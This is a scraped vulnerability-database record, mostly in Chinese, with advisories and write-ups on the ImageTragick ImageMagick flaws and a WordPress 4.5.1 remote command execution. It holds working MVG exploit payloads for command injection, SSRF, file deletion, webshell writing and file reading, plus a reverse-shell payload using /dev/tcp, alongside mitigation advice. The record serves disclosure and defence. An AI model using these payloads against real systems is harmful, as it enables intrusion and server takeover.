-dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pnmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:mono\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"rgba\" encode=\"rle\" mode=\"encode\" command=\""rawtorle" -o "%o" -v "%i"\"/>\r\n <delegate decode=\"scan\" command=\""scanimage" -d "%i" > "%o"\"/>\r\n <delegate decode=\"scanx\" command=\""scanimage" > "%o"\"/>\r\n <delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n <delegate decode=\"shtml\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"svg\" command=\""rsvg-convert" -o "%o" "%i"\"/>\r\n <delegate decode=\"txt\" encode=\"ps\" mode=\"bi\" command=\""enscript" -o "%o" "%i"\"/>\r\n <delegate decode=\"miff\" encode=\"win\" stealth=\"True\" spawn=\"True\" command=\""/usr/bin/display" -immutable -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n <delegate decode=\"wmf\" command=\""wmf2eps" -o "%o" "%i"\"/>\r\n <delegate decode=\"xps:color\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ppmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"xps:cmyk\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=bmpsep8" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"xps:mono\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n</delegatemap>\r\n```\r\n\r\n\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u5b83\u5b9a\u4e49\u4e86\u5f88\u591a\u5360\u4f4d\u7b26\uff0c\u6bd4\u5982%i\u662f\u8f93\u5165\u7684\u6587\u4ef6\u540d\uff0c%l\u662f\u56fe\u7247exif label\u4fe1\u606f\u3002\u800c\u5728\u540e\u9762command\u7684\u4f4d\u7f6e\uff0c%i\u548c%l\u7b49\u5360\u4f4d\u7b26\u88ab\u62fc\u63a5\u5728\u547d\u4ee4\u884c\u4e2d\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u4e5f\u56e0\u6b64\u800c\u6765\uff0c\u88ab\u62fc\u63a5\u5b8c\u6bd5\u7684\u547d\u4ee4\u884c\u4f20\u5165\u4e86\u7cfb\u7edf\u7684system\u51fd\u6570\uff0c\u800c\u6211\u4eec\u53ea\u9700\u4f7f\u7528\u53cd\u5f15\u53f7\uff08`\uff09\u6216\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\r\n\r\n\u6f0f\u6d1e\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u662f\u5229\u7528\u4e86\u5982\u4e0b\u7684\u8fd9\u4e2a\u59d4\u6258\uff1a\r\n\r\n```\r\n<delegate decode=\"https\" command=\""curl" -s -k -o "%o" "https:%M"\"/>\r\n```\r\n\r\n\u5b83\u5728\u89e3\u6790https\u56fe\u7247\u7684\u65f6\u5019\uff0c\u4f7f\u7528\u4e86curl\u547d\u4ee4\u5c06\u5176\u4e0b\u8f7d\uff0c\u6211\u4eec\u770b\u5230%M\u88ab\u76f4\u63a5\u653e\u5728curl\u7684\u6700\u540e\u4e00\u4e2a\u53c2\u6570\u5185\u3002ImageMagick\u9ed8\u8ba4\u652f\u6301\u4e00\u79cd\u56fe\u7247\u683c\u5f0f\uff0c\u53ebmvg\uff0c\u800cmvg\u4e0esvg\u683c\u5f0f\u7c7b\u4f3c\uff0c\u5176\u4e2d\u662f\u4ee5\u6587\u672c\u5f62\u5f0f\u5199\u5165\u77e2\u91cf\u56fe\u7684\u5185\u5bb9\uff0c\u800c\u8fd9\u5176\u4e2d\u5c31\u53ef\u4ee5\u5305\u542bhttps\u5904\u7406\u8fc7\u7a0b\u3002\r\n\r\n\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a.mvg\u683c\u5f0f\u7684\u56fe\u7247\uff08\u4f46\u6587\u4ef6\u540d\u53ef\u4ee5\u4e0d\u4e3a.mvg\uff0c\u6bd4\u5982\u4e0b\u56fe\u4e2d\u5305\u542bpayload\u7684\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u4e3avul.gif\uff0c\u800cImageMagick\u4f1a\u6839\u636e\u5176\u5185\u5bb9\u8bc6\u522b\u4e3amvg\u56fe\u7247\uff09\uff0c\u5e76\u5728`https://`\u540e\u9762\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u5199\u5165\u81ea\u5df1\u8981\u6267\u884c\u7684\u547d\u4ee4\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://\"|id; \")'\r\npop graphic-context\r\n```\r\n\u8fd9\u6837\uff0cImageMagick\u5728\u6b63\u5e38\u6267\u884c\u56fe\u7247\u8f6c\u6362\u3001\u5904\u7406\u7684\u65f6\u5019\u5c31\u4f1a\u89e6\u53d1\u6f0f\u6d1e\uff1a\r\n\r\n\r\n\r\n\u5176\u4ed6\u51e0\u4e2aCVE\u4e5f\u6bd4\u8f83\u6709\u8da3\uff0c\u6bd4\u5982CVE-2016-3718\uff0c\u4ed6\u662f\u5229\u7528mvg\u683c\u5f0f\u4e2d\u53ef\u4ee5\u5305\u542burl\u7684\u7279\u70b9\uff0c\u8fdb\u884cSSRF\u653b\u51fb\uff0cPOC\u5982\u4e0b\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n```\r\n\r\nCVE-2016-3715\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684ephemeral\u534f\u8bae\uff0c\u6765\u5220\u9664\u4efb\u610f\u6587\u4ef6\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n```\r\n\r\nCVE-2016-3716\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684msl\u534f\u8bae\uff0c\u6765\u8fdb\u884c\u6587\u4ef6\u7684\u8bfb\u53d6\u548c\u5199\u5165\u3002\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c06\u4efb\u610f\u6587\u4ef6\u5199\u4e3a\u4efb\u610f\u6587\u4ef6\uff0c\u6bd4\u5982\u5c06\u56fe\u7247\u5199\u4e3a\u4e00\u4e2a.php\u540e\u7f00\u7684webshell\u3002\r\n\r\n\u7279\u522b\u8bf4\u660e\u7684\u662f\uff0cmsl\u534f\u8bae\u662f\u8bfb\u53d6\u4e00\u4e2amsl\u683c\u5f0f\u7684xml\u6587\u4ef6\uff0c\u5e76\u6839\u636e\u5176\u5185\u5bb9\u6267\u884c\u4e00\u4e9b\u64cd\u4f5c\uff1a\r\n\r\n```\r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n\r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n```\r\n\r\nCVE-2016-3717\u53ef\u4ee5\u9020\u6210\u672c\u5730\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@/etc/hosts'\r\npop graphic-context\r\n```\r\n\r\n### 0x02 \u6df1\u5165\u5206\u6790\r\n\u9664\u4e86\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u4ee5\u5916\uff0c\u5404\u4e2a\u5b89\u5168\u7814\u7a76\u4eba\u5458\u4e5f\u96c6\u601d\u5e7f\u76ca\uff0c\u53d1\u73b0\u8fd9\u4e2a\u6d1e\u7684\u66f4\u591a\u5229\u7528/\u5f71\u54cd\u65b9\u5f0f\u3002\r\n\r\n\u9996\u5148\uff0cPHP\u6269\u5c55\u300eImageMagick\u300f\u4e5f\u5b58\u5728\u8fd9\u4e2a\u95ee\u9898\uff0c\u800c\u4e14\u53ea\u9700\u8981\u8c03\u7528\u4e86Imagick\u7c7b\u7684\u6784\u9020\u65b9\u6cd5\uff0c\u5373\u53ef\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff1a\r\n\r\n```\r\n<?php\r\nnew Imagick('vul.gif');\r\n\r\n```\r\n\u56e0\u4e3a\u6ca1\u6709\u8fd4\u56de\u503c\uff0c\u6211\u5229\u7528cloudeye\u6355\u6349\u5230apache\u65e5\u5fd7\uff0c\u4ece\u65e5\u5fd7\u4e2d\u8bfb\u53d6\u547d\u4ee4\u6267\u884c\u7684\u7ed3\u679c\uff1a\r\n\r\n\r\n\r\n\u53e6\u5916\uff0c\u7ecf\u8fc7\u5206\u6790\uff0c\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u9664\u4e86.mvg\u683c\u5f0f\u7684\u56fe\u7247\u4ee5\u5916\uff0c\u666e\u901apng\u683c\u5f0f\u7684\u56fe\u7247\u4e5f\u80fd\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002\u6211\u4eec\u770b\u5230\u524d\u9762\u59d4\u6258\u4e2d\u5bf9%l\uff0c\u4e5f\u5c31\u662fexif label\u7684\u5904\u7406\uff1a\r\n```\r\n<delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n```\r\n\u5b83\u5c06%l\u62fc\u63a5\u8fdb\u5165\u4e86/usr/bin/display\u547d\u4ee4\u4e2d\uff0c\u6240\u4ee5\u6211\u53ea\u9700\u5c06\u6b63\u5e38\u7684png\u56fe\u7247\uff0c\u5e26\u4e0a\u4e00\u4e2a\u300e\u6076\u610f\u300f\u7684exif\u4fe1\u606f\u3002\u5728\u8c03\u7528ImageMagick\u5c06\u5176\u5904\u7406\u6210.show\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u5373\u53ef\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff1a\r\n\r\n```\r\nexiftool -label=\"\\\"|/usr/bin/id; \\\"\" test.png\r\nconvert test.png o.show\r\n```\r\n\r\n\r\n\u4f46\u8fd9\u4e2a\u65b9\u6cd5\u9e21\u808b\u4e4b\u5904\u5728\u4e8e\uff0c\u56e0\u4e3adelegate.xml\u4e2d\u914d\u7f6e\u7684encode=\"show\"\uff08\u6216\"win\"\uff09\uff0c\u6240\u4ee5\u53ea\u6709\u8f93\u51fa\u4e3a.show\u6216.win\u683c\u5f0f\u7684\u60c5\u51b5\u4e0b\u624d\u4f1a\u8c03\u7528\u8fd9\u4e2a\u59d4\u6258\uff0c\u800c\u666e\u901a\u7684\u6587\u4ef6\u5904\u7406\u662f\u4e0d\u4f1a\u89e6\u53d1\u8fd9\u4e2a\u547d\u4ee4\u7684\u3002\r\n\r\n### 0x03 \u5f71\u54cd\u5206\u6790\r\n\r\nImageMagick\u662f\u4e00\u4e2a\u4f7f\u7528\u975e\u5e38\u5e7f\u7684\u7ec4\u4ef6\uff0c\u5927\u91cf\u5382\u5546\u90fd\u5728\u5904\u7406\u56fe\u7247\u7684\u65f6\u5019\u8c03\u7528\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u5904\u7406\uff0c\u800c\u4e14\u5f88\u591a\u5f00\u6e90\u5e94\u7528\u4e5f\u5728\u6838\u5fc3\u4ee3\u7801\u4e2d\u5305\u542b\u4e86ImageMagick\u9009\u9879\u3002\r\n\r\nWordpress\u662f\u8457\u540d\u7684\u4e2a\u4eba\u535a\u5ba2/CMS\u5382\u5546\uff0c\u5176\u6838\u5fc3\u6e90\u7801\u4e2d\u4f7f\u7528\u4e86PHP\u6269\u5c55ImageMagick\u3002\u53d7\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u5728\u653b\u51fb\u8005\u62e5\u6709\u4e00\u5b9a\u6743\u9650\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u5728Wordpress\u4e2d\u89e6\u53d1\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff1a [WooYun: Wordpress\u67d0\u6838\u5fc3\u529f\u80fd\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08\u4e00\u5b9a\u6743\u9650\uff09](http://www.wooyun.org/bugs/wooyun-2016-0205047)\r\n\r\n\u540c\u6837\u7684\uff0cDiscuz\u3001Drupal\u7b49\u5e38\u7528CMS\u4e2d\u4e5f\u8c03\u7528\u4e86ImageMagick\u6269\u5c55\u6216ImageMagick\u5e93\uff0cCVE-2016-3714\u4e5f\u53ef\u80fd\u4f1a\u5f71\u54cd\u5230\u4ed6\u4eec\u3002\r\n\r\n\u4f46\u6839\u636e\u6211\u5bf9Discuz\u7684\u5206\u6790\uff0c\u5176\u8c03\u7528ImageMagick\u5904\u7406\u56fe\u7247\u4e4b\u524d\uff0c\u4f1a\u5148\u4f7f\u7528php\u7684getimagesize\u8fdb\u884c\u56fe\u7247\u683c\u5f0f\u3001\u5927\u5c0f\u7684\u9a8c\u8bc1\uff0c\u6240\u4ee5\u672c\u6587\u4e2d\u6240\u6d89\u53ca\u7684POC\u65e0\u6cd5\u5728Disucz\u4e2d\u76f4\u63a5\u4f7f\u7528\uff0c\u4f46\u4e0d\u6392\u9664\u6709\u5176\u4ed6\u65b9\u6cd5\u7ed5\u8fc7discuz\u5bf9\u8be5\u95ee\u9898\u7684\u9650\u5236\u3002\r\n\r\n\u9664\u4e86\u5f00\u6e90\u8f6f\u4ef6\u4e2d\u7684\u6f0f\u6d1e\u4ee5\u5916\uff0c\u56fd\u5185\u5916\u5404\u5927\u5382\u5546\u6216\u591a\u6216\u5c11\u90fd\u6536\u5230\u4e86\u8be5\u95ee\u9898\u7684\u5f71\u54cd\uff0c\u5f71\u54cd\u6700\u5927\u7684\u5e94\u8be5\u5c5e\u4eba\u4eba\uff0c\u4eba\u4eba\u67d0\u5904\u4e0a\u4f20\u4f4d\u7f6e\u8c03\u7528\u4e86ImageMagick\u8fdb\u884c\u56fe\u7247\u7684\u5904\u7406\uff0c\u7ed3\u679c\u9020\u6210\u4e86\u547d\u4ee4\u6267\u884c\uff0c\u5bfc\u81f4\u5185\u7f51\u88ab\u767d\u5e3d\u5b50\u653b\u7834\uff1a [WooYun: \u4eba\u4eba\u7f51\u67d0\u6f0f\u6d1e\u5bfc\u81f4\u76f4\u63a5Getshell\u5f71\u54cd\u4e3b\u5e72\u7f51\u7edc\u76f4\u5165\u5185\u7f51](http://www.wooyun.org/bugs/wooyun-2016-0205171)\r\n\r\n\u53e6\u5916\uff0c\u767e\u5ea6\u3001\u4f18\u9177\u3001\u817e\u8baf\u3001\u4e03\u725b\u7b49\u8bf8\u591a\u5382\u5546\u90fd\u6536\u5230\u8be5\u6f0f\u6d1e\u5f71\u54cd\r\n\r\n\u8fd8\u6709\u4e2a\u6bd4\u8f83\u6709\u610f\u601d\u7684\u5730\u65b9\uff0c\u56e0\u4e3a\u65b0\u6d6asae\u7684php\u5305\u542bImageMagick\u6269\u5c55\uff0c\u6240\u4ee5\u4e4c\u4e91\u4e0a\u6709\u767d\u5e3d\u5b50\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u6210\u529f\u7ed5\u8fc7\u4e86sae\u7684\u6c99\u76d2 [WooYun: SAE \u6c99\u76d2\u7ed5\u8fc7\uff08ImageMagick CVE20163714 \u5e94\u7528\u5b9e\u4f8b\uff09](http://www.wooyun.org/bugs/wooyun-2016-0205051)\r\n\r\n### 0x04 \u6f0f\u6d1e\u4fee\u590d\r\n\u5173\u4e8e\u8fd9\u4e2a\u6f0f\u6d1e\u5f71\u54cdImageMagick 6.9.3-9\u4ee5\u524d\u662f\u6240\u6709\u7248\u672c\uff0c\u5305\u62ecubuntu\u6e90\u4e2d\u5b89\u88c5\u7684ImageMagick\u3002\u800c\u5b98\u65b9\u57286.9.3-9\u7248\u672c\u4e2d\u5bf9\u6f0f\u6d1e\u8fdb\u884c\u4e86\u4e0d\u5b8c\u5168\u7684\u4fee\u590d\u3002\u6240\u4ee5\uff0c\u6211\u4eec\u4e0d\u80fd\u4ec5\u901a\u8fc7\u66f4\u65b0ImageMagick\u7684\u7248\u672c\u6765\u675c\u7edd\u8fd9\u4e2a\u6f0f\u6d1e\u3002\r\n\r\n\u73b0\u5728\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u4e24\u4e2a\u65b9\u6cd5\u6765\u6682\u65f6\u89c4\u907f\u6f0f\u6d1e\uff1a\r\n\r\n\u5904\u7406\u56fe\u7247\u524d\uff0c\u5148\u68c0\u67e5\u56fe\u7247\u7684 \"magic bytes\"\uff0c\u4e5f\u5c31\u662f\u56fe\u7247\u5934\uff0c\u5982\u679c\u56fe\u7247\u5934\u4e0d\u662f\u4f60\u60f3\u8981\u7684\u683c\u5f0f\uff0c\u90a3\u4e48\u5c31\u4e0d\u8c03\u7528ImageMagick\u5904\u7406\u56fe\u7247\u3002\u5982\u679c\u4f60\u662fphp\u7528\u6237\uff0c\u53ef\u4ee5\u4f7f\u7528getimagesize\u51fd\u6570\u6765\u68c0\u67e5\u56fe\u7247\u683c\u5f0f\uff0c\u800c\u5982\u679c\u4f60\u662fwordpress\u7b49web\u5e94\u7528\u7684\u4f7f\u7528\u8005\uff0c\u53ef\u4ee5\u6682\u65f6\u5378\u8f7dImageMagick\uff0c\u4f7f\u7528php\u81ea\u5e26\u7684gd\u5e93\u6765\u5904\u7406\u56fe\u7247\u3002\r\n\u4f7f\u7528policy file\u6765\u9632\u5fa1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6587\u4ef6\u9ed8\u8ba4\u4f4d\u7f6e\u5728 /etc/ImageMagick/policy.xml \uff0c\u6211\u4eec\u901a\u8fc7\u914d\u7f6e\u5982\u4e0b\u7684xml\u6765\u7981\u6b62\u89e3\u6790https\u7b49\u654f\u611f\u64cd\u4f5c\uff1a\r\n```\r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n```\r\n\r\n### \u76f8\u5173\u94fe\u63a5\r\n\r\n* https://imagetragick.com/\r\n\r\n* http://www.openwall.com/lists/oss-security/2016/05/03/18\r\n\r\n* http://weibo.com/p/1001603971443670055277\r\n\r\n\u611f\u8c22 @redrain\u6709\u8282\u64cd @Ricter @BigBan \r\n\r\n\r\n### PoCs\r\nhttps://github.com/ImageTragick/PoCs", "published": "2016-05-04T00:00:00", "type": "seebug", "title": "ImageMagick \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n (ImageTragick)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91446", "id": "SSV:91446", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:11:48", "description": "\u6765\u6e90 [http://ricterz.me/](http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462424557950),\u683c\u5f0f\u7a0d\u4f5c\u6574\u7406\r\n\r\n### ImageMagick\r\n\r\nImageMagick \u6628\u5929\u66dd\u51fa [CVE-2016-3714](https://www.seebug.org/vuldb/ssvid-91446)\uff0cJava\u3001PHP \u7684\u5e93\u4e5f\u53d7\u5176\u5f71\u54cd(\u53ef\u53c2\u8003 https://www.seebug.org/vuldb/ssvid-91446 )\u3002\u5176\u4e2d PHP \u7684\u5e93 Imagick \u5e94\u7528\u5e7f\u6cdb\uff0c\u6ce2\u53ca\u4e5f\u5927\u3002Wordpress \u4e5f\u5c31\u662f\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\u51fa\u73b0\u4e86 RCE\u3002\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u5f88\u8822\uff0cImageMagick \u5728 MagickCore/constitute.c \u7684 ReadImage \u51fd\u6570\u4e2d\u89e3\u6790\u56fe\u7247\uff0c\u5982\u679c\u56fe\u7247\u5730\u5740\u662f```https://```\u5f00\u5934\u7684\uff0c\u5373\u8c03\u7528 InvokeDelegate\u3002\r\nMagickCore/delegate.c \u5b9a\u4e49\u4e86\u59d4\u6258\uff0c\u7b2c 99 \u884c\u5b9a\u4e49\u4e86\u8981\u6267\u884c\u7684\u547d\u4ee4\u3002\r\n\u6700\u7ec8 InvokeDelegate \u8c03\u7528 ExternalDelegateCommand \u6267\u884c\u547d\u4ee4\u3002\r\n\r\n\r\n\r\nMagickCore/delegate.c\r\n\r\n\r\n\r\n\r\n\r\n\u4e3a\u4e86\u8ba9\u5927\u5bb6\u66f4\u6e05\u695a\u7684\u770b\u89c1\uff1a\r\n\r\n\r\n\u81f3\u6b64\uff0c\u4e00\u4e2a\u547d\u4ee4\u6ce8\u5165\u5c31\u5f62\u6210\u4e86\u3002\r\n\r\n### Wordpress\r\n\r\nWordpress \u5728\u56fe\u50cf\u5904\u7406\u7684\u65f6\u5019\u9ed8\u8ba4\u4f18\u5148\u9009\u62e9 Imagick Library\u3002\r\n\r\nwp-includes/media.php:_wp_image_editor_choose\r\n\r\n\r\n\u5982\u679c\u80fd\u627e\u5230\u4e00\u4e2a\u70b9\uff0c\u8c03\u7528\u4e86 Imagick \u7c7b\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u3002\r\nwp-includes/media.php:wp_get_image_editor\r\n\r\n\r\n\u8fd9\u4e2a\u51fd\u6570\u5b9e\u4f8b\u5316\u4e86 WP_Image_Editor_Imagick \u7c7b\u3002\u5168\u5c40 grep \u4e00\u4e0b wp_get_image_editor \u53ef\u4ee5\u53d1\u73b0\u51e0\u5904\u8c03\u7528\u7684\u5730\u65b9\uff0c\u6bd4\u5982wp_crop_image\u3002\r\nwp-admin/includes/image.php:wp_crop_image\r\n\r\n\r\n\u8fd9\u6837\u5bfb\u627e\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\u7684\u5730\u65b9\u5c31\u597d\u4e86\u3002\r\n\u50cf\u5446\u5b50\u4e0d\u5f00\u53e3\u90a3\u6837\u6276\u4e86\u6276\u955c\u6846\uff0c\u627e\u5230\u4e00\u4e2a\u3002\u8981\u6c42\u7684\u6700\u5c0f\u6743\u9650\u662f Author\u3002\r\n\u4e0d\u662f Unauthorized \u5c31\u53ef\u4ee5\u5229\u7528\u7684 RCE\uff0c\u771f\u662f\u96be\u8fc7\u554a..\r\n\r\n### PoC\r\n\r\n\u7528 Author \u6743\u9650\u8d26\u53f7\u767b\u9646\uff0c\u53d1\u8868\u6587\u7ae0\uff0c\u63d2\u5165 Media\u3002\r\n\u4e0a\u4f20\u53e6\u5916\u4e00\u4e2a\u6b63\u5e38\u683c\u5f0f\u7684\u6587\u4ef6\uff1a\r\n\r\n\r\n\u8bb0\u4f4f post_id\uff0c\u6211\u8fd9\u4e2a\u4e3a 101\u3002 \u518d\u4e0a\u4f20 exp.png\uff0c\u5185\u5bb9\u4e3a\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|bash -i >& /dev/tcp/127.0.0.1/2333 0>&1\")'\r\npop graphic-context\r\n```\r\n\u8fd9\u4e2a\u7684 post_id \u4e3a 102\u3002\r\n\r\n\u63a5\u7740\u70b9\u51fb\u6211\u4eec\u6b63\u5e38\u7684\u90a3\u4e2a\u56fe\u7247\uff0c\u9009\u62e9\u7f16\u8f91\uff1a\r\n\r\n \r\n\u7136\u540e\u70b9 Edit Origin\u3002\u8fdb\u53bb\u6253\u5f00\u63a7\u5236\u53f0\uff0c\u968f\u4fbf\u505a\u4e00\u4e9b\u64cd\u4f5c\u540e\u6293\u5305\u62ff\u5230\u8bf7\u6c42\u7684 URL\u3002\u76f4\u63a5 Copy as cURL \u5c31\u597d\u4e86\u3002\r\n\r\n \r\n\u518d\u70b9\u51fb\u574f\u6389\u7684\u56fe\u7247-Edit-Edit Origin\uff0c\u6293\u5305\u770b\u5230\u8bf7\u6c42\u7684 admin-ajax.php\uff0c\u62ff\u51fa _ajax_nonce\u3002\u6700\u540e\u6539\u6389\u4e4b\u524d Copy as cURL \u5185\u7684 _ajax_nonce \u548c post_id\uff0c\u4e0b\u56fe\u5212\u6846\u6846\u7684\u5730\u65b9\u662f\u8981\u6539\u7684\u5730\u65b9\u3002\r\n\r\n\r\n\r\n\u56de\u8f66\r\n\r\n\r\n\r\nshell \u5df2\u7ecf\u8eba\u597d\u4e86\u3002\r\n\r\n### \u5176\u4ed6\u53c2\u8003\u5730\u5740\r\n* https://www.seebug.org/vuldb/ssvid-91446\r\n* https://imagetragick.com/\r\n* http://www.openwall.com/lists/oss-security/2016/05/03/18\r\n* https://blog.sucuri.net/2016/05/imagemagick-remote-command-execution-vulnerability.html", "published": "2016-05-05T00:00:00", "type": "seebug", "title": "Wordpress 4.5.1 Remote Command Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714"], "modified": "2016-05-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91463", "id": "SSV:91463", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-05-04T21:20:06", "description": "ImageMagick - Multiple Vulnerabilities. CVE-2016-3714,CVE-2016-3715,CVE-2016-3716,CVE-2016-3717,CVE-2016-3718. Dos exploits for multiple platform", "published": "2016-05-04T00:00:00", "type": "exploitdb", "title": "ImageMagick < 6.9.3-9 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "id": "EDB-ID:39767", "href": "https://www.exploit-db.com/exploits/39767/", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\r\nvulnerabilities in ImageMagick.\r\nWe've reported these issues to developers of ImageMagick and they made a\r\nfix for RCE in sources and released new version (6.9.3-9 released\r\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\r\nfix seems to be incomplete. We are still working with developers.\r\n\r\nImageMagick: Multiple vulnerabilities in image decoder\r\n\r\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\r\n(potentially remote) code execution\r\n\r\nInsufficient filtering for filename passed to delegate's command allows\r\nremote code execution during conversion of several file formats.\r\n\r\nImageMagick allows to process files with external libraries. This\r\nfeature is called 'delegate'. It is implemented as a system() with\r\ncommand string ('command') from the config file delegates.xml with\r\nactual value for different params (input/output filenames etc). Due to\r\ninsufficient %M param filtering it is possible to conduct shell command\r\ninjection. One of the default delegate's command is used to handle https\r\nrequests:\r\n\"wget\" -q -O \"%o\" \"https:%M\"\r\nwhere %M is the actual link from the input. It is possible to pass the\r\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\r\n-la'. (wget or curl should be installed)\r\n\r\n$ convert 'https://example.com\"|ls \"-la' out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n\r\n\r\nThe most dangerous part is ImageMagick supports several formats like\r\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\r\nthis file format and idea of the local file read vulnerability in\r\nImageMagick, see below), maybe some others - which allow to include\r\nexternal files from any supported protocol including delegates. As a\r\nresult, any service, which 